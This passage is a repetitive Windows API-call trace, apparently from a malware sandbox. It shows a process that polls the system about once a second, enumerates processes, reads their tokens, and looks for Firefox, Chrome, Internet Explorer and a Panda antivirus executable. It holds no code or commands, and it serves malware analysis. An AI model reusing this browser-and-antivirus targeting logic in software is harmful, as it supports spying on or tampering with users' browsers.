WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0150.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf910) returned 0xc0000004 [0150.235] VirtualAlloc (lpAddress=0x0, dwSize=0x10910, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0150.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10910, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0150.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0150.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0150.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0150.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0150.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0150.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0150.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0150.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0150.242] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.242] CloseHandle (hObject=0x2f0) returned 1 [0150.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0150.242] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.242] CloseHandle (hObject=0x2f0) returned 1 [0150.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0150.243] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.243] CloseHandle (hObject=0x2f0) returned 1 [0150.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0150.243] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.243] CloseHandle (hObject=0x2f0) returned 1 [0150.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0150.243] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.243] CloseHandle (hObject=0x2f0) returned 1 [0150.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0150.244] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.244] CloseHandle (hObject=0x2f0) returned 1 [0150.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0150.244] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.244] CloseHandle (hObject=0x2f0) returned 1 [0150.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0150.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0150.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0150.245] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.245] CloseHandle (hObject=0x2f0) returned 1 [0150.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0150.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0150.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0150.245] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.245] CloseHandle (hObject=0x2f0) returned 1 [0150.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0150.245] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0150.246] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0150.246] GetLastError () returned 0x7a [0150.246] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0150.246] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0150.246] CloseHandle (hObject=0x2ec) returned 1 [0150.246] CloseHandle (hObject=0x2f0) returned 1 [0150.246] GetLengthSid (pSid=0x54010a8) returned 0x1c [0150.246] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0150.247] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0150.247] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0150.247] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0150.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0150.247] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0150.247] CloseHandle (hObject=0x2f0) returned 1 [0150.248] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0151.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf910) returned 0xc0000004 [0151.239] VirtualAlloc (lpAddress=0x0, dwSize=0x10910, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0151.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10910, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0151.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0151.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0151.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0151.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0151.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0151.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0151.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0151.279] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.279] CloseHandle (hObject=0x2f0) returned 1 [0151.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0151.279] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.279] CloseHandle (hObject=0x2f0) returned 1 [0151.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0151.279] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.279] CloseHandle (hObject=0x2f0) returned 1 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0151.280] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.280] CloseHandle (hObject=0x2f0) returned 1 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0151.280] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.280] CloseHandle (hObject=0x2f0) returned 1 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0151.280] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.280] CloseHandle (hObject=0x2f0) returned 1 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0151.280] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.280] CloseHandle (hObject=0x2f0) returned 1 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0151.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0151.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0151.281] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.281] CloseHandle (hObject=0x2f0) returned 1 [0151.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0151.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0151.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0151.281] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.281] CloseHandle (hObject=0x2f0) returned 1 [0151.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0151.281] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0151.281] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0151.281] GetLastError () returned 0x7a [0151.281] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0151.282] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0151.282] CloseHandle (hObject=0x2ec) returned 1 [0151.282] CloseHandle (hObject=0x2f0) returned 1 [0151.282] GetLengthSid (pSid=0x54010a8) returned 0x1c [0151.282] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0151.282] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0151.282] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0151.282] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0151.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0151.282] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0151.282] CloseHandle (hObject=0x2f0) returned 1 [0151.283] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0152.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf7d0) returned 0xc0000004 [0152.293] VirtualAlloc (lpAddress=0x0, dwSize=0x107d0, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0152.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x107d0, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0152.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0152.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0152.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0152.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0152.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0152.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0152.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0152.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0152.307] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.307] CloseHandle (hObject=0x2f0) returned 1 [0152.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0152.307] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.307] CloseHandle (hObject=0x2f0) returned 1 [0152.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0152.308] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.308] CloseHandle (hObject=0x2f0) returned 1 [0152.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0152.308] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.308] CloseHandle (hObject=0x2f0) returned 1 [0152.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0152.308] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.308] CloseHandle (hObject=0x2f0) returned 1 [0152.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0152.308] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.308] CloseHandle (hObject=0x2f0) returned 1 [0152.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0152.308] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.308] CloseHandle (hObject=0x2f0) returned 1 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0152.309] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.309] CloseHandle (hObject=0x2f0) returned 1 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0152.309] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.309] CloseHandle (hObject=0x2f0) returned 1 [0152.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0152.309] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0152.309] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0152.309] GetLastError () returned 0x7a [0152.310] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0152.310] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0152.310] CloseHandle (hObject=0x2ec) returned 1 [0152.310] CloseHandle (hObject=0x2f0) returned 1 [0152.310] GetLengthSid (pSid=0x54010a8) returned 0x1c [0152.310] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0152.310] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0152.310] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0152.310] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0152.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0152.310] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0152.310] CloseHandle (hObject=0x2f0) returned 1 [0152.311] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0153.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf730) returned 0xc0000004 [0153.321] VirtualAlloc (lpAddress=0x0, dwSize=0x10730, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0153.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10730, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0153.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0153.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0153.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0153.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0153.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0153.327] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.327] CloseHandle (hObject=0x2f0) returned 1 [0153.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0153.327] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.327] CloseHandle (hObject=0x2f0) returned 1 [0153.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0153.327] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.327] CloseHandle (hObject=0x2f0) returned 1 [0153.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0153.327] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.327] CloseHandle (hObject=0x2f0) returned 1 [0153.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0153.327] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.328] CloseHandle (hObject=0x2f0) returned 1 [0153.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0153.328] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.328] CloseHandle (hObject=0x2f0) returned 1 [0153.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0153.329] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.329] CloseHandle (hObject=0x2f0) returned 1 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0153.329] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.329] CloseHandle (hObject=0x2f0) returned 1 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0153.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0153.329] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.329] CloseHandle (hObject=0x2f0) returned 1 [0153.330] 